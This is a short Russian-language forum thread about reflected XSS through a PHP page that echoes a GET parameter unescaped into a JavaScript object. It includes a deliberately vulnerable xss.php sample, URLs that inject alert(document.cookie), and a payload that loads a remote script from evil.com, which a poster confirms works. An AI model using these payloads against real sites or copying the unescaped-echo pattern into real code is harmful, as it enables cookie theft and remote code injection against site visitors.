//http://site.com/?var=1;alert(123);alert(456) var myVar = <?=$_GET['var']?> да, да, я что-то такое хотел, но настоящее, чтобы не разрушить зараженный объект и выполнить дополнительный код получилось вот так
// xss.php
<!doctype html>
<html>
<head>
<script>
window.onload = function() {
var obj = {
url: 'getdata.php?var=<?php echo $_GET["var"]; ?>'
}
}
</script>
</head>
<body></body>
</html>
а вот вредный url:
xss.php?var=12%27,%20t1:%20%28function%28%29{var%20s=document.createElement%28%27script%27%29;s.type=%22text/javascript%22;s.src=%22http://evil.com/script.js%22;document.body.appendChild%28s%29}%29%28%29,%20t2:%27
или так
xss.php?var=12', t1: (function(){var s=document.createElement('script');s.type="text/javascript";s.src="http://evil.com/script.js";document.body.appendChild(s)})(), t2:'
хотя это уже оффтоп конечно |
animhotep, и то.
//http://site.com/?var=1';alert(document.cookie);' url: 'getdata.php?var=<?=$_GET['var']?>'; |
Цитата:
url:'getdata.php?var=1';alert(document.cookie);' mta88, спасибо, понял. это работает |
К сожалению методы не работают.
P.s. Данный скрипт находится в html файле, а не в js Нашел решение, изменил html на php Всем спасибо. |
| Часовой пояс GMT +3, время: 17:27. |